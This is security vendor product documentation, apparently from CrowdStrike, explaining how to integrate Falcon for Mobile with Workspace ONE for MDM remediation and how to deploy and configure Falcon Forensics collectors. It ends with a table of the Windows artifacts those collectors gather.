1. If you configured zero-touch enrollment for Falcon for Mobile, click the assignment containing zero-touch settings.
2. If you manually enrolled your Android devices:
  1. Click Add Assignment.
  2. In the Distribution area, enter a name and select any assignment groups that contain devices protected by Falcon for Mobile.
Configure the device UID.
1. Click Application Configuration.
2. If you created a new assignment, enable Send Configuration.
3. Find the entry for mdm_device_id, and in the text field enter: {DeviceUid}
4. Click Save or Create.

Configure the device UID for iOS devices

For iOS devices with a manually configured Content Filter or Per-App VPN profile, you must add the UID to this profile.

If you used the Falcon console to create a custom profile type for Workspace ONE, you can skip this step.

In Workspace ONE, go to Resources > Profiles & Baselines > Profiles.
Open the profile used to deploy Falcon for Mobile.
Expand the configuration area. Depending on your profile type, this area is either Content Filter or VPN.
In the Custom Data area, click Add.
In the Key field, enter mdm_device_id.
In the Value field, enter {DeviceUid}.

Step 1b: Configure authentication settings in Workspace ONE

Falcon for Mobile requires authentication credentials to connect to Workspace ONE. Although Workspace ONE supports OAuth, basic, and certificate authentication, Falcon for Mobile currently implements only OAuth and basic auth.

We recommend using OAuth when possible. OAuth uses a client ID and secret, which you configure in the OAuth Client Management area in Workspace ONE. For more info, see Configure OAuth in Workspace ONE.

If OAuth isn’t supported in your environment, such as for on-premises installations of Workspace ONE, you can use basic auth with an API key and Workspace ONE login credentials. The Workspace ONE user must have a role assigned that has editing permissions for Workspace ONE APIs. Enable basic auth and configure the API key in the REST API area of Workspace ONE. For more info, see Configure the API key in Workspace ONE.

Configure OAuth in Workspace ONE

Create the client ID and secret for Falcon to authenticate to Workspace ONE.

In Workspace ONE, go to Groups & Settings > Configurations.
Click OAuth Client Management.
Click Add.
Enter a name and description.
Select the organization group that protects your devices with Falcon for Mobile.

Note: You must select a group without children. For more info, see Selecting the Workspace ONE organization group.
Select a role that has editing permissions for REST APIs.
Click Save to generate the client ID and client secret.
Record your API client secret somewhere safe. After closing the window, the secret is no longer visible in Workspace ONE.
Click Close.

Use these credentials when configuring the connection to Workspace ONE in the Falcon console.

Configure the API key in Workspace ONE

Generate the API key for Falcon to authenticate to Workspace ONE.

In Workspace ONE, go to Groups & Settings > All Settings.
Select System > Advanced > API > REST API.
In the General tab, make sure Enable API Access is enabled, and then click Add.
Enter the service name and make note of the generated API key.
Click the Authentication tab.
Enable Basic and click Save.

Use the API key when configuring the connection to Workspace ONE in the Falcon console.

Step 1c: Configure the integration in the Falcon console

Perform the initial configuration to connect Falcon to Workspace ONE and to complete remediation setup.

Before you begin, gather this information:

The REST API URL for your instance of Workspace ONE

You can find the REST API URL at Groups & Settings > All Settings > System > Advanced > Site URLs.
The authentication credentials you created for Workspace ONE

For more info, see Step 1b: Configure authentication settings in Workspace ONE.
(OAuth2 authentication only) The token URL, which is region-specific

To find your region’s URL, see Workspace ONE Access Token URL mapping.
The name of the organization group in Workspace ONE that contains devices protected by Falcon for Mobile

For more info, see Selecting the Workspace ONE organization group.

Connect Falcon to Workspace ONE

Use the Connect an MDM workflow to complete remediation setup. This enables remediation triggers for all of your mobile policies.

In the Falcon Console, go to Endpoint security > Configure > Mobile policies .
Click Connect an MDM.

The CrowdStrike Store opens.
Select Workspace ONE.
Click Configure.
Click Add configuration.
In the API URL field, enter the REST API URL of your Workspace ONE instance.
Select the authentication type and enter the credentials you created in Workspace ONE.
- OAuth 2.0 Client Credential: Enter the client ID, client secret, and token URL.
- Basic Auth: Enter the API key and a username and password used to log in to Workspace ONE. The user must have a role assigned that has editing permissions for REST APIs.
Click Save configuration.
Complete the remediation setup.
1. Click Manage Mobile Policies or go to Endpoint security > Configure > Mobile policies .
  
  The MDM remediation setup window opens.
2. From the Organization group menu, select the organization in Workspace ONE that contains devices protected by Falcon for Mobile.
3. Make sure that Send remediation triggers to MDM is turned on.
4. Click Save settings.

Step 2: Configure remediation triggers in Falcon

When a detection on a mobile device is found, Falcon checks to see whether the detection has an associated and enabled remediation trigger. If the detection matches an active trigger, Falcon notifies Workspace ONE with the detection type and configured severity.

After completing remediation setup, triggers are enabled in all policies. You can configure and disable individual triggers on a per-mobile policy basis. For more info about configuring and managing mobile policies, see, Managing mobile policies.

Remediation trigger considerations

Consider these points when configuring remediation triggers.

Any new triggers added by Crowdstrike in future releases will not be enabled by default and must be enabled manually in mobile policies.
To use the DebuggableFlagTurnedOn remediation trigger for Android devices, you must also enable the Currently installed apps setting in your mobile policy. For more info, see Access to sensitive data types.

Configure remediation triggers

In the Falcon console, go to Endpoint security > Configure > Mobile policies .
Find the policy to configure and click Edit Policy.

Tip: Alternatively, you can create a policy instead. For more info, see Create a mobile policy.
Click the Remediations tab.
Click the trigger you want to modify.
In the Details panel, click Edit remediation trigger and perform any of these actions:
- To enable or disable the trigger, click the Status toggle.
- To modify the severity, use the Severity menu.
- To reset the trigger to the default severity, click Reset to default.
Click Update Setting.

Step 3: Configure remediation actions in Workspace ONE

After you complete the initial integration setup, Falcon creates tags in Workspace ONE. Use these tags in compliance policies, which you can configure to send notifications or apply remediation actions to devices with matching tags.

How Workspace ONE uses tags to identify devices

Workspace ONE uses tags to identify devices based on a particular attribute. After you complete the workflow to set up remediation in the Falcon console, Falcon automatically creates 2 sets of tags in Workspace ONE in the organization group you selected.

Detection tags align with the detections in the remediation triggers. For each enabled remediation trigger in Falcon, there’s an equivalent detection tag in Workspace ONE.
Severity tags correspond to severities configured in your remediation triggers. There are 4 severity tags: low, medium, high, and critical.

When a device generates a detection with a remediation trigger, Falcon instructs Workspace ONE to apply the related detection tag and, if needed, the related severity tag.

Note: All tags created by this integration are prefixed with CRWD_. For example, the tag for a severity of high is named CRWD_SeverityHigh.

Severity tag aggregation

Although a device can have multiple detection tags assigned, only one severity tag can be assigned to a device at a time. Falcon instructs Workspace ONE to assign the highest severity belonging to the currently assigned detection tags.

For example, a device might have these 2 active detections:

Root access detected, with a severity of critical
Lock screen not set, with a severity of low.

In this case, the tag with a severity of critical is assigned to the device.

Any time detection tags are added to or removed from a device, Falcon reevaluates all existing detections and determines if a new severity applies. Falcon instructs Workspace ONE to add or remove the appropriate detection tag and if needed, apply a different severity tag.

Deleting tags from Workspace ONE

If you disable a specific remediation trigger in a mobile policy, the related detection tag in Workspace ONE is removed from devices belonging to that policy.

If you change the organization group for this integration, Falcon removes the current tags in Workspace ONE and re-creates the tags under the new organization. If you disable remediation triggers, you have the option to keep or remove tags from Workspace ONE. For more info, see Disable or delete the integration.

Viewing tags

View the list of CrowdStrike tags in Workspace ONE.

In Workspace ONE, go to Groups & Settings > All Settings.
In the Device & Users area, select Advanced > Tags.
If needed, select the appropriate organization from the menu.

Using compliance policies

Compliance policies in Workspace ONE determine what remediation actions to apply when devices are potentially compromised. Compliance policies are made up of rules, actions, and assignments. Rules and assignments specify which devices are affected by the policy. Actions specify what happens when a device matches the rule and assignment criteria of the policy. Actions can include sending a notification or applying a profile that restricts usage of certain apps.

Using tags in compliance policy rules

Workspace ONE uses rules in compliance policies to determine the conditions for when a compliance policy should be applied to specified devices. For this integration, you must configure at least one rule with the Device tags criteria and specify one or more of the integration tags prefixed with CRWD_.

For example, if you want to apply the compliance policy whenever a device’s lock screen isn’t set, use CRWD_LockScreenNotSet. Or if you want to apply the policy if a device triggers a critical detection, use CRWD_SeverityCritical.

Create a compliance policy

In Workspace ONE, go to Security > Compliance Policies > List View.
Click Add.
Select the mobile device platform.
Configure one or more rules to trigger when the policy is applied. You must configure at least one rule with the Device tags criteria and specify one or more of the integration tags prefixed with CRWD_.
Click Next.
Configure the action to take, such as sending a notification or applying a more restrictive profile to the device.
Click Next.
Configure the Assignment area.
1. From the Managed By menu, select the organization.
2. In the Smart Groups field, enter or select groups to apply the policy to.
  
  Tip: If all devices in your environment are protected by Falcon for Mobile, and you want to assign all devices to this policy, select the organization group you used to set up the integration. You can also create smart groups in Workspace ONE for more control and granularity over which devices a policy can apply to.
3. If needed, configure groups to be excluded.
4. Click Next.
Enter a name and description for the compliance policy.
Click Finish & Activate.

If a device is assigned a tag belonging to any smart groups referenced in the compliance policy, the configured action is taken and the device is marked in Workspace ONE as noncompliant.

Manage the Workspace ONE integration

You can edit integration credentials or remediation settings, or disable the integration.

Edit Workspace ONE credentials

If your Workspace ONE credentials change, you must update them in Falcon.

In the Falcon console, go to Endpoint security > Configure > Mobile policies .
Click MDM connected.
Click Edit your MDM credentials.

The CrowdStrike Store opens.
Select your MDM.
Click Configure.
Modify settings as needed and click Save configuration.

Edit the Workspace ONE organization group in Falcon

If needed, you can change the Workspace ONE organization group.

Note: You must select a group without children. For more info, see Selecting the Workspace ONE organization group.

In the Falcon console, go to Endpoint security > Configure > Mobile policies .
Click Remediation triggers enabled.
Select the Organization Group and then click Save settings.

Disable or delete the integration

If you need to pause remediation triggers, you can disable the integration. If you no longer want to integrate with Workspace ONE, you can disable and then delete the integration.

When disabling, you have the option to remove all tags in Workspace ONE. For more info about tags, see How Workspace ONE uses tags to identify devices.

In the Falcon console, go to Endpoint security > Configure > Mobile policies .
Click Remediation triggers enabled.
Turn off Send remediation triggers to MDM.
If needed, select Remove all CrowdStrike tags from MDM.
Click Save Settings.
To delete the integration:
1. On the Mobile policies page, click MDM connected.
2. Click Delete settings.

View non-compliant devices in Workspace ONE

If a device triggers a detection and a compliance policy is applied to it, the device appears in Workspace ONE as non-compliant.

In Workspace ONE, to go Devices > List View.
Click the Compliance Status column to sort by compliance status.

Devices that have triggered a remediation action will have 2 or more tags prefixed with CRWD_.
Click a row to view device info.

View detections in the Falcon console

All Falcon for Mobile detections, including detections associated with remediation triggers, appear in Endpoint security > Monitor > Mobile detections .

Use case: Restricting Android app access on devices without a lock screen

If one of your protected devices doesn’t have a lock screen set, you might want to send a notification and restrict access to certain apps in case the device is lost or stolen. You might also want to increase the default trigger severity from low to high.

Step 1: Configure the remediation trigger in Falcon

Go to Endpoint security > Configure > Mobile policies .
Find the policy to configure and click Edit Policy.
Click the Remediation triggers tab.
Click the LockScreenNotSet trigger.
In the Details panel, click Edit remediation trigger.
Make sure the trigger status is On.
From the Severity menu, select High.
Click Update setting.

Step 2: Create an Android profile with app restrictions

In Workspace ONE, go to Resources > Profiles & Baselines > Profiles.
Click Add > Add Profile.
Select Android.
Enter a name for the profile.
Locate the Restrictions entry and click Add.
Scroll down to Application and disable apps such as the camera or Chrome.
Click Next.
Click Save & Publish.

Step 3: Create a compliance policy

In Workspace ONE, go to Devices > Compliance Policies > List View.
Click Add and select Android.
Configure a rule to apply to all devices.
1. From the first menu, select Device tags.
2. From the second menu, select Contains Any.
3. From the third menu, select CRWD_LockScreenNotSet.
Click Next.
Configure the notification action.
1. From the first menu, select Notify.
2. Use the other menus to configure how and where you’d like the notifications sent.
Configure the profile action.
1. Click the add icon.
2. From the first menu, select Profile.
3. From the second menu, select Install Compliance Profile.
4. In the Profile Name field, enter the name of the Android profile you created.
Click Next.
Configure the Assignment area.
1. From the Managed By menu, select the organization.
2. In the Smart Groups field, select the group that contains devices protected by Falcon for Mobile.
3. Click Next.
Enter a name and description for the compliance policy.
Click Finish & Activate.

Falcon Forensics

Collect forensic data to use in incident response investigation and threat hunting.

Falcon Forensics for Windows, Mac, and Linux

Learn how to deploy Falcon Forensics. Discover the different data types that can be collected.

Overview

Falcon Forensics lets you collect forensic triage data from workstations and servers within your environment. You can use the collected forensic data to perform incident response investigations, compromise assessments, and threat hunting.

Requirements

Requires all of these subscriptions:

Falcon Insight XDR
Falcon Forensics

System requirements:

Windows
- Windows XP SP2 and newer
- Windows Server 2003 and newer
- 2 GB of available disk space
macOS
- 10.13 High Sierra
- 10.14 Mojave
- 10.15 Catalina
- 11 Big Sur
- 12 Monterey
- 13 Ventura
- 14 Sonoma
- 15 Sequoia
- 26 Tahoe
Linux x64
Ubuntu LTS 14/18/20
CentOS 6/7/8
RHEL 6/7/8
A workstation computer with PowerShell 5.1 or newer is required for leveraging PSFalcon for deployment. PowerShell is available for Mac and is described on the official PowerShell Github page.
Linux kernels
- Kernel 3.2.0 and later are supported
- Kernel 2.6.32 and earlier are not supported
  
  Note: Kernel versions between 2.6.32 and 3.2.0 might produce varying results.

Sensor:

The Falcon sensor is not required to use Falcon Forensics. There are specific features that require the Falcon sensor. Falcon Forensics is compatible with all supported Falcon sensor versions.

Roles:

View collections, configurations, collectors, and the Forensics app in Falcon console:

Forensic Investigator

Download the Forensics app from Falcon console:

Endpoint Manager
Falcon Administrator
Falcon Analyst
Falcon Analyst: Read Only
Falcon Investigator
Falcon Security Lead

Create and edit configurations:

Forensics Configuration Manager

Create and edit collections. Deploy and shut down collectors:

Forensics Queue Manager

For more information about roles, see Roles for Falcon Forensics.

Network connection:

A network connection to the Forensics cloud endpoints is required. For a list of endpoints, see Falcon Forensics.

For more requirements, see Plan to deploy Falcon Forensics.

Understand Falcon Forensics

CrowdStrike Falcon Forensics collects a snapshot of forensic triage data after it executes on each system. The collector then uploads the snapshot of forensic triage data to the CrowdStrike cloud. That data is available for analysis in the Falcon console for 30 days. If you need more than 30 days, you can download the data using Falcon Data Replicator (FDR).

Tip: In this guide, when you are asked to input your "CID with checksum", this means the CID and the CID's checksum.

Configuration

A configuration is a collection profile that contains settings and specifies one or more collectors.

For more info about configurations, see Create a configuration.

Collector

A collector is a set of instructions that collects artifacts and file metadata defined in the collector options. After you create a configuration, you can run a collector in a collection.

For a detailed list of all collectors, see Falcon Forensics Collectors.

Collection

A collection is a set of forensic collections defined in a configuration, against a set of target machines.

For more info about collections, see Create a collection.

Collection ID

Collection ID is a unique identifier of a collection performed on a host.

Audit logs

There are audit logs for create, delete, and update actions related to the Forensic API collection and configuration endpoints. Go to Audit logs > Audit logs > API.

How the Falcon Forensics executable works

When using a default configuration template (and not opted in to customizable collections): Falcon Forensics scans the system and uploads a stream of collected system metadata to the CrowdStrike cloud. It runs the default configuration template for the specified platform and then exits.

When using a user-created configuration (after opt in): The executable will first connect to the CrowdStrike cloud and then wait for a configuration to be sent to it from a collection. This allows for tailored data collection based on your needs.

Work with collections and configurations

Falcon Forensics collections allow you to define and collect specific artifacts that may not be included in default collection templates. You can reduce data collection size by targeting only the most relevant artifacts for an investigation, instead of running a full system collection.

Customizable collections enhance forensic investigations by providing precise control over data collection while maintaining the speed and reliability of Falcon Forensics.

If you are a new Falcon Forensics customer, you can start creating collections and configurations immediately. Existing customers must choose to opt-in to use customizable collections.

There are many potential use cases for custom collections and configurations.

You need to collect unique file types or paths.
You want a narrow and focused investigation.
Your investigation is time-critical and full collections aren't necessary.

Create a collection

Create a new collection in the Falcon console:

Go to Endpoint security > Forensics > Forensics Collections .
Click Create collection.
If you have not opted in to customizable collections, a notification appears. Type OPT-IN into the text box. And then click Opt-in.
Add Collection Tag information, or keep the default text. Tags allow you to group collections in Falcon console, Forensics dashboards, and Advanced Event Search.
Set a Deadline if you want to set a date and time after which the collection will not run.
Set Priority if you want to create multiple collections, where some run before others based on priority ranking.
You must define at least one Collection target. There are several options you can use.
1. Sensor hosts: Click Add filters. Click an item and add a value. For example, click Host ID, and add the ID.
2. Known hosts: Select from a dropdown of hosts where the Falcon Forensics Collector has run previously. Provides both Agent IDs (AIDs) and Falcon For Cloud ID (FFCIDs).
3. Manual entry Agent IDs (AIDs): Manually input AIDs to target, one per line.
4. Manual entry Falcon For Cloud IDs (FFCIDs): Manually input FFCIDs to target one per line.
Set Configurations. Define which configuration gets pushed to collection targets. You must select one from each platform, even if you are not running a collection on that platform. The collection will not run if none of the AIDs or FFCIDs match that platform. This allows multi-platform collections to be performed.

Create a configuration

Configurations gather specific artifacts on Windows, Mac, and Linux platforms. You can define exactly what is collected and how many records are collected. This allows you to make smaller, faster, and more efficient configurations. For example, a configuration that only collects browser events that occurred during the last 5 days.

Create a new configuration in the Falcon console:

Go to Endpoint security > Forensics > Forensics Collections .
Click the Manage configurations button.
Click New configuration to start from a blank configuration or you can select an existing configuration and click Duplicate.
Enter a Name for your configuration.
Optional. Add a Description to differentiate your configuration from existing ones.
Choose a Platform:
- Windows
- Linux
- Mac
Optional. Self destruct will delete the executable and any output files created from running the configuration. If you want to run multiple collections, do not turn on Self destruct until your last configuration. This will prevent having to repeatedly execute the collector.
Optional. Select Advanced options:
- Locale ID: Sets a Windows Language Code. For example: en-US is 0x0409.
- Disk space: Checks available disk space before executing a collection. A collection does not run if there is less than the set amount of disk space. The collector does not write much data to the drive as it takes a streaming approach.
- Maximum CPU percentage: Sets CPU priority to idle and limits maximum CPU usage (1-99%). Set to 0 for idle priority with no usage limit.
- Low IO: Sets a delay after each file operation to reduce disk IO load.
If you started with a blank configuration, click Create. This allows you to add collectors to the configuration. If you duplicated an existing configuration, you can add collectors at any time.
Click Add Collector.
Select a collector from the list. You can add multiples of the same collector, as long as you give them unique Names. Configurations can have as few or as many collectors as you need.
- Clicking a collector displays configuration options. For detailed info about collector options, see Falcon Forensics Collectors.
Click Add to add the collector to the configuration list. Repeat this process until your configuration is complete.

Manage configurations

Configurations can be modified to adjust their collection parameters and limitations, thereby aligning them with evolving requirements. You do not need to create new configurations each time. You can duplicate existing configurations to suit specific needs. A configuration can be designated as the default for your environment by selecting it and then clicking Set as default. Replacing the default configuration means that newly created collections use this configuration, instead of the pre-defined Default Template.

Manage your configurations in the Falcon console:

Go to Endpoint security > Forensics > Forensics Collections .
Click Manage Configurations.
Click an existing configuration.
CrowdStrike-owned configurations: You can Set as default or Duplicate. You cannot modify these templates.
User-created configurations: You can Set as default, Duplicate, or Delete. You can also edit configuration settings and collectors.
- Modifications to collectors are saved automatically as collectors are added or changed. However, if you change the configuration Settings in the center pane, you must click Save.

View status of collections

Go to Endpoint security > Forensics > Forensics Collections .
On this page you will see the Collection Tag for all performed collections.

Use data from offline or legacy collections

To gain visibility into data from air-gapped hosts or Windows devices with deprecated operating systems, run collections in offline mode or on legacy operating systems and then submit the collections to the CrowdStrike cloud.

Run an offline collection on an air-gapped device

Note: At this time, offline collections can only run the default configuration and cannot be used for user-created configurations.

For an air-gapped device with a version of Windows, Mac, or Linux that CrowdStrike supports, run an offline collection using one of these commands. Replace <CID with Checksum> with your CID and the CID's checksum.

Windows, as Administrator:

FalconForensicsCollectorWindows<Cloud>.exe -cid <CID with Checksum> -offline

Mac and Linux:

sudo ./FalconForensicsCollectorLinux<Cloud> -cid <CID with Checksum> -offline

Tip: To capture browser events, you must specify -offline-browser instead of -offline when you run an offline collection.

These collectors produce a file within an upload_bucket folder in the current directory.

Note: If the collector was deployed in Windows using RTR, the resulting fcx file can be found in system32.

Logs are stored in these locations:

Windows: C:\crowdstrike
Mac and Linux: /opt/CrowdStrike

These file logs provide the collection ID for an offline collection. This collection ID is required to track events.

Run a legacy collection on an unsupported device

For a device with a Windows version that CrowdStrike no longer supports, run a legacy collection.

Download the legacy collector.
```
FalconForensicsCollectorLegacyOS.exe
```
Run the collector as Administrator, specifying the CID.
```
FalconForensicsCollectorLegacyOS.exe –cid <CID with Checksum>
```
Windows limits the number of characters in a file path to 260. To stay within this limit, launch the Falcon Forensics Collector near the root folder. For example, you could use a folder one level off of the root folder. C:\FFC\FalconForensicsCollectorLegacyOS.exe.

The collector produces a file with a .ffc extension in the current folder.
Copy the collection to a host that has a connection to the CrowdStrike cloud.

Run an offline collection with a custom configuration

For an air-gapped device with a version of Windows, Mac, or Linux that CrowdStrike supports, run an offline collection with a custom configuration with the following commands. Replace <CID with Checksum> with your CID and the CID's checksum. You must pull the configuration from the configuration-download endpoint. The file has an .fcxconfig extension.

For more info, see Falcon Forensics APIs.

Do the following:

Windows, as Administrator:

FalconForensicsCollectorWindows<Cloud>.exe -cid <CID with Checksum> -offline-config <path to config>

Mac and Linux:

sudo ./FalconForensicsCollectorLinux<Cloud> -cid <CID with Checksum> -offline-config <path to config>

These collectors produce a file within an upload_bucket folder in the current directory.

Note: If the collector was deployed in Windows using Real Time Response, the resulting .fcx file can be found in system32.

Logs are stored in these locations:

Windows: C:\crowdstrike

Mac and Linux: /opt/CrowdStrike

These file logs provide the collection ID for an offline collection. This collection ID is required to track events.

Submit collections to the Crowdstrike cloud

These parameters are required when submitting collections:

All file names must be unique.
A valid CID is required to upload an offline collection file.

These guidelines may help when submitting collections:

Use a matching cloud executable for each upload. For example, use a US-1 binary to upload a US-1 package and a US-2 binary for a US-2 package.
You can submit a collection for a CID from a system on another CID, if both CIDs are on the same CrowdStrike cloud.
Note: The offline collection’s CID takes precedence for searching purposes.

To submit an offline or legacy file to the CrowdStrike cloud, run one of these commands:

Windows:

path\to\ffc.exe -cid <CID with Checksum> -file <path_to_file>

Mac and Linux:

sudo ./ffc -cid <CID with Checksum> -file <path_to_file>

Falcon Forensics delivered through Falcon Data Replicator

To deliver your Falcon Forensics events into an S3 bucket, use Falcon Data Replicator. For instructions about setting up your credentials and accessing Falcon Forensics events, see Falcon Data Replicator.

Work with the Unix-like Artifacts Collector (UAC)

Falcon Forensics supports previously unsupported Unix operating systems using the Unix-like Artifacts Collector (UAC). UAC is a Live Response collection script for Incident Response. For more information about UAC, see the official UAC Documentation.

Set up the UAC binary

The UAC must be downloaded and launched from your system to start gathering collections.

Download the UAC binary from GitHub.

Unix-like Artifacts Collector (UAC)
Uncompress the file, and then launch it.

Gather a collection using the UAC

When using UAC, the examiner flag must be used. In order for the data to be routed to your instance, you must input your CID and the CID's checksum. For example:

./uac -p full --examiner <CID with Checksum> /tmp

This command will run the full profile and put the resulting tar.gz file in the /tmp directory. You can also choose which specific artifacts are collected. You can upload the tar.gz file to the cloud if the -–examiner field is filled in. The file is uploaded the same as an offline collection. For example:

Mac/Linux

sudo <path to ffc> -cid <CID with Checksum> -file <path to UAC archive>

Windows

From administrator command prompt or RTR:

 -cid <CID with Checksum> -file <path to UAC archive>

Send data to a parent from a child CID

Run collections on a child CID of a parent CID and view the data of all child CIDs from a parent CID in Advanced event search.

These are the requirements to send data to a parent from a child CID.

The parent CID must have a Falcon Falcon Forensics subscription
A child CID must already be set up as a child CID of the parent CID to which you’d like to send the child CID’s Forensics collection
Valid CIDs for both the child and parent CIDs

Send data from a child CID to a parent CID and aggregate their Falcon Forensics Collector data with the parent CID’s data by opening a terminal session on the child CID and run the following command, replacing <child CID> with the Child CID and <parent CID> with the Parent CID.

Mac and Linux

sudo ./ffc -cid <child CID> -dest-cid <parent CID>

Windows

ffc.exe -cid <child CID> -dest-cid <parent CID>

Search for a specific child CID collection by running a query in Advanced event search, Endpoint security > Forensics > Advanced event search , from a parent CID and using the field, ForensicsOriginCustomerId to view data from the child CID. ForensicsOriginCustomerId is present in every forensics event sent from a child CID on which users have added -dest-cid.

Collected forensics data: Default template

Falcon Forensics collects the following forensic triage data when you use default collection templates for Windows, Mac, and Linux.

Windows

Collector	Data collected	Event generated	Limitations
Amcache	Amcache registry hive entry, which contains metadata related to Windows Portable Executable binary image (PE) execution and program installation.	AmcacheEntry - Metadata related to PE execution and program installation on Windows 7 and Server 2008 R2 and above.	Files above 20MB are not hashed.
BAM	Gathers Background Activity Moderator (BAM) registry entry.	BamRegAppRunTime - Recent program execution timeline from Background Activity Moderator (BAM) system service registry. BAM key is written on system shutdown. RecentExecutionTimestamp - Recent execution timestamp from a Forensics artifact.	None
Browser	Gathers Windows browser artifacts.	BrowserCookieInfo - Browser tracking cookie information. BrowserDownloadStart - Browser downloaded file information signifying download start time. BrowserDownloadEnd - Browser downloaded file information signifying download end time. BrowserExtensionInfo - Browser extension/addon information. BrowserHistoryVisit - Information about a browser history entry.	1,000 events
DataStore	Processes Windows Update history stored in the DataStore.edb file.	OsUpdateTimestamp - Details about an operating system update.	None
Defender	Pulls Defender thread and detection details and generates MpThreat, MpThreatDetection, and dirlist related events for detected and threat file.	MpThreat - Microsoft Protection Threat, information about the threat identified by Defender. MpThreatDetection - A detection from the Microsoft Protection, also known as Defender.	None
Dirlist	Generates a list of files and sub-directories.	FileInfo - Details about the file. FileTimestampMetadata - File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file. SignInfo - Information about the signing state of an image.	500,000 for non-portable executables. Files above 5MB are not hashed. 100,000 for portable executables. Files above 20MB are not hashed.
Drivers	Provides information about driver files.	DriverLoad - Notifies of a driver load.	Files above 20MB are not hashed.
Drives	Generates a list of all disks and the FsVolumeMounted event.	FsVolumeMounted - Information about a volume that was just mounted.	None
Env	Collects information about all system variables and current user variables.	RuntimeEnvironmentVariable - In the context of Falcon Forensics, this is an environment variable provided to the collector process itself.	None
Events	Collects Windows event logs.	LogEntry - Information about a log entry observed on an endpoint.	5,000 per event log source. 1,825 day limit.
FeatureUsage	Collects Feature Usage registry keys, per-user.	RegFeatureUsageInfo - Information about Feature Usage registry keys contains details per user and last login/last write timestamps. This is collected alongside Dirlist-related events.	None
Files	Summarizes all files on a system drive and collects all of this information into a FileStatisticInfo event.	FilesStatisticInfo - Contains information about a files statistic. It’s a much less noisy version of Dirlist events and meant to give complementary information.	None
Firewall	Shows information about the Windows host-based firewall rules.	FirewallRuleInfo - Contains information about firewall rules created on the host.	None
Groups	Shows information about all user groups in the system.	LocalGroupIdentity - Group identity information includes user group name, GID, names, UIDs, and SID of user members.	None
Handles	Shows information for each entry in a process handle table referencing a kernel object.	ProcessHandleTableEntry - Information about an entry in the process handle table that references a kernel object.	None
Jobs	Shows all atjobs in use.	AtJobInfo - Windows atjobs in use.	None
Jumplist	Shows information from the Jumplist, which are recently opened files.	JumpListInfo - Jumplist file information.	None
Link	Gives information for each link file and its target file. Target file can be found using Dirlist related events.	LinkFileInfo - Collects file metadata about link files.	Files above 5MB are not hashed.
LogFile	Collects warning and error log events.	FileEntry - Text version of warning and error events.	None
Magic	Collects information about files within the file system that have fake extensions, such as a DOIUV file extension, but the byte signature belongs to a PE extension.	FileSignatureMismatch - On-demand scan for files with name extensions and header magic values.	Portable executables only. Files above 20MB are not hashed.
Mal	Gives information about malicious DLL files that have identical base names, but different SHA256 hashes to MalPaths events.	MalPaths - Malicious DLL or executable image name conflicts found in different or unexpected folders.	None
Master File Table (MFT)	Collects information about deleted MFT file records.	MftBootSector - Windows Master File Table (MFT) Boot sector. MftRecord - Windows Master File Table (MFT) record.	Limited to files created in last 365 days.
Network	Collects network information for several different parts of the system including IPv4 and v6 events.	IPv4: LocalIpAddressIP4 - IPv4 Address on the machine. NetworkListenIP4 - IPv4 Network listen event. NetworkReceiveAcceptIP4 - IPv4 network SYN event. NetworkConnectIP4 - IPv4 network connect event. NetworkCloseIP4 - IPv4 network close event. RouteIP4 - IPv4 Route entry. IPv6: LocalIpAddressIP6 - IPv6 Address on the machine. NetworkListenIP6 - IPv6 Network listen event. NetworkReceiveAcceptIP6 - IPv6 network SYN event. NetworkConnectIP6 - IPv6 network connect event. NetworkCloseIP6 - IPv6 network close event. RouteIP6 - IPv6 Route entry. DNS: DnsServer - DNS server IP addresses. NetworkDnsSuffix - A network suffix name in the configured DNS suffix list. DnsCache - DNS cache entry. ARP: NeighborListIP4 - An entry in the ARP table. NeighborListIP6 - An entry in the ARP table. Host File: NetworkHostsFileEntry - A hostname entry in the network hosts file.	None
PCA	Collects information about application launch entries in Program Compatibility Assistant.	PcaAppLaunchEntry - An application launch entry in windows Program Compatibility Assistant (PCA) file PcaAppLaunchDic.txt. PcaGeneralDbEntry - An application launch entry in windows Program Compatibility Assistant (PCA) database PcaGeneralDb[0-9]+.txt.	None
PEInfo	Collects information about the Portable Executable (PE) header information, to PeHeaderInfo and Dirlist related events for the PE file.	PeHeaderInfo - Portable Executable header information from a Windows executable. PeHeaderOptionalInfo - Portable Executable optional header information from a Windows executable. PeSectionInfo - Windows Portable Executable (PE) section information.	None
Pipes	Collects information about named pipes.	NamedPipe - Information about a named pipe.	None
Prefetch	Extracts information from PF files and Layout.ini files.	PrefetchFile - Prefetch or Layout file records 8 most recent execution times of a Windows application.	None
PSList	Shows current running processes into ProcessRollup2 events.	ProcessRollup2 - Returns information about a running process. UserName is the owner of the process.	Files above 20MB are not hashed.
Recentfiles	Collects entries in the RecentFileCache.bcf. This is only used in Windows 7 collections.	The events emitted are part of the dirlist events.	Files above 20MB are not hashed.
Recycle	Collects files found in the Recycle Bin.	FileDeleted - File entry and details in the Recycle Bin.	None
Regdump	Collects information about registry entries.	RegGenericInfo - Generic information about a registry entry.	Max entry size: 1MB
RegFile	Transforms file references in the registry to RegGenericInfo events and Dirlist related events.	RegGenericInfo - Generic information about a registry entry, as well as Dirlist events.	None
SDB	Collects each tag entry in the Shim Database (SDB).	ShimDbTag - Tag entry in the Shim Database.	None
Services	Collects information about running services.	ServicesStatusInfo - Detailed information and status of a windows service.	Files above 20MB are not hashed.
Shares	Collects information about network shares.	NetShareInfo - Information about a shared resource.	None
Shellbag	Collects information for each entry in the Shellbag MRU registry hive.	ShellBagInfo - Windows ShellBag MRU registry entry. ShellBagFileTimestampMetadata - An event is emitted per timestamp from a ShellBag registry entry.	None
Shim	Collects information for each Application Compatibility (Shim) Cache registry entry module.	RegShimCache - Shim cache registry entry.	Files above 20MB are not hashed.
SRUM	Collects details about system resource usage by each user process in the Application Resource table of the System Resource Usage Monitor database. Also collects network resources, data usage and resource usage timeline.	SruApplicationResourceUsage - System Resource Utilization Monitor: application resource usage per user. SruNetworkDataUsage - System Resource Utilization Monitor: bytes sent/received per local network interface, application and user tuple. SruApplicationTimelineProvider - System Resource Utilization Monitor: application resource usage timeline. SruNetworkConnectivityUsage - System Resource Utilization Monitor: connection time per local network interface, application, and user tuple.	None
StartupInfo	Collects information about each process started during the first 90 seconds of bootup in StartupInfo XML files.	AutoRunProcessInfo - Describes a process that was automatically executed.	None
Superfetch	Collects information from AgForegroundAppHistory.db and each application running schedule/period from AgGlobalHistory.db.	SuperfetchAppInfo - Application entry from Windows Superfetch AgForegroundAppHistory.db. SuperfetchAppSchedule - Application running schedule/period recently updated from Windows Superfetch AgGlobalHistory.db.	None
